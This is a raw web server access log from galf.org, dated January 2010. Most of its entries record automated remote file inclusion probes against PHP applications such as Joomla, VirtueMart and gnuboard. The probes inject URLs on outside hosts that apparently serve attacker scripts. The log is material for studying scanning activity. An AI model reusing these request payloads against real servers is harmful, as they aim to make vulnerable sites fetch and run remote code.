113.30.66.166 - - [25/Jan/2010:07:00:15 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:21 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:21 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:21 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:30 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:00:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:07:00:33 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:07:00:33 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:07:00:33 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:07:00:33 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
72.10.164.122 - - [25/Jan/2010:07:00:57 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:07:01:03 -0800] "GET /write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:07:01:03 -0800] "GET /logs//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.94.62 - - [25/Jan/2010:07:01:04 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://124.0.94.62/gnuboard4/.../Id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:05 -0800] "GET /logs/access.log//?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:05 -0800] "GET /?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:05 -0800] "GET /logs//?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:07:01:09 -0800] "GET /?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:07:01:09 -0800] "GET /logs/access.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:07:01:09 -0800] "GET /logs/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:15 -0800] "GET /logs/access.log//?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:15 -0800] "GET /?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
75.125.176.130 - - [25/Jan/2010:07:01:15 -0800] "GET /logs//?board=free&act=http://www.bokji.or.kr/open.jpg??? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:07:02:14 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:02:32 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:02:42 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:02:42 -0800] "GET /logs/access.log%20%20/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:02:43 -0800] "GET /logs/access.log%20%20/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.146.168 - - [25/Jan/2010:07:02:48 -0800] "GET /logs/access.log//citywriter/head.php?path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.145.141.36 - - [25/Jan/2010:07:03:37 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
193.145.141.36 - - [25/Jan/2010:07:03:37 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
193.145.141.36 - - [25/Jan/2010:07:03:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:09 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:09 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:09 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:11 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:11 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:11 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:05:13 -0800] "GET /logs//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:05:14 -0800] "GET /ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:05:14 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:25 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:25 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:25 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:57 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:57 -0800] "GET /phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.166 - - [25/Jan/2010:07:05:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:13 -0800] "GET ///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:13 -0800] "GET /logs////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:13 -0800] "GET /logs/access_090720.log////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [25/Jan/2010:07:06:19 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [25/Jan/2010:07:06:19 -0800] "GET /phphtml.php?htmlclass_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.108.236.148 - - [25/Jan/2010:07:06:19 -0800] "GET /logs/phphtml.php?htmlclass_path=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.145.141.36 - - [25/Jan/2010:07:06:21 -0800] "GET /logs/access_091130.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ppslaterent.com/brd/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:24 -0800] "GET /logs////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:24 -0800] "GET /logs/access_091228.log%20%20////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:24 -0800] "GET ///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:06:33 -0800] "GET /logs/access_091207.log%20%20////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:07:07:04 -0800] "GET /php?pluginpath[0]=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:09 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:09 -0800] "GET /playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:09 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:07:27 -0800] "GET ///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:07:27 -0800] "GET /logs/access_091228.log////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:07:27 -0800] "GET /logs////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:49 -0800] "GET /logs/access_090921.log%20%20/playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:49 -0800] "GET /playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:07:07:49 -0800] "GET /logs/access_090921.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [25/Jan/2010:07:07:50 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:07:08:02 -0800] "GET /logs/access_091207.log////technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:07:08:25 -0800] "GET /write_update.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:07:08:25 -0800] "GET /logs//write_update.php?board_skin_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:09:28 -0800] "GET /logs/access.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:07:09:37 -0800] "GET /logs/access.log/?sourcedir=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:10:33 -0800] "GET /ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:10:33 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:10:33 -0800] "GET /logs//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:54 -0800] "GET /logs/access.log%20%20///common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:54 -0800] "GET /logs///common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:54 -0800] "GET //common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:57 -0800] "GET //common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:57 -0800] "GET /logs/access.log%20%20///common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [25/Jan/2010:07:11:57 -0800] "GET /logs///common/db.php?commonpath=http://www.carex.co.kr/data/product/11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:12:11 -0800] "GET ////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:12:11 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:12:11 -0800] "GET /logs/access.log%20%20/////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:12:23 -0800] "GET /logs/access_090720.log//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:07:12:55 -0800] "GET /logs/access.log/?sourcedir=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:13:43 -0800] "GET /logs/access.log/////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:15:36 -0800] "GET /logs/access.log%20%20/////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:15:36 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.210.98.170 - - [25/Jan/2010:07:15:36 -0800] "GET ////delete_comment.php?board_skin_path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:15:51 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:10 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:10 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:10 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:11 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:11 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:11 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:17 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:17 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:16:17 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:07:16:56 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:07:16:56 -0800] "GET /?sourcedir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.93.36.90 - - [25/Jan/2010:07:16:56 -0800] "GET /logs/?sourcedir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
60.251.165.181 - - [25/Jan/2010:07:17:53 -0800] "GET /logs/access_090720.log//ashnews.php?pathtoashnews=http://jamroom.judephotography.com//id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:07:18:02 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:07:18:02 -0800] "GET /write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [25/Jan/2010:07:18:02 -0800] "GET /logs/write_update.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:20 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:34 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:34 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.255.228.8 - - [25/Jan/2010:07:25:34 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.reikorea.org/list/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:26:11 -0800] "GET /?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 1048 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:26:11 -0800] "GET /logs//?pg=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 4804 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:26:11 -0800] "GET /?pg=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
65.98.80.2 - - [25/Jan/2010:07:26:11 -0800] "GET /logs//?pg=http://www.alst.ru/cmd??&u=x HTTP/1.1" 200 4804 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
